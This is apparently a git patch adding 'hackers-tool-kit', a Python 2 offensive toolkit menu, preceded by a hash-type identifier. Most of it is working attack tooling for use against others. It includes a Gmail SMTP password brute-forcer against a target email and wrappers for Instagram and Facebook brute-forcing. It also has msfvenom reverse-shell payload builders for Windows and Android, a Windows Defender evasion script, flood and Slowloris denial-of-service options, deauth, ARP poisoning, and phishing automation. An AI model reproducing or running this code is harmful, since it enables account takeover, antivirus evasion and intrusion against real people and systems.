hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -def upgrade(): - os.system("apt update && apt upgrade") -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arppois": - appois() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - found = True -mainbanner() -main() From 71b078d76d2898d53d8591ad004142c0a1d40324 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 18 Mar 2019 04:36:02 +0100 Subject: [PATCH 044/214] Add files via upload --- htk.py | 2018 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 2018 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..87289da --- /dev/null +++ b/htk.py @@ -0,0 +1,2018 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to edit this script without my credit +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +def mainbanner(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +? : displays this message +clear : clears screen except for banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn TIP: "ctrl c" usually stops a script if you dont want to keep running it +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal +arppois : ARP poisoning +sslscan : ssl scan a host +payload : make a metasploit payload of your choice +crunch : Make wordlists +traff : shows your internet traffic +resa : reset account password +resu : reset unix password +hashid : find the type of hash of a hash +wafwoof : check a web application for firewall +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +\033[91m---------------------------------------------------------------------------------\033[0m + """ +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) +def wifite(): + os.system("wifite") +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +def netdev(): + os.system("netdiscover") +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): 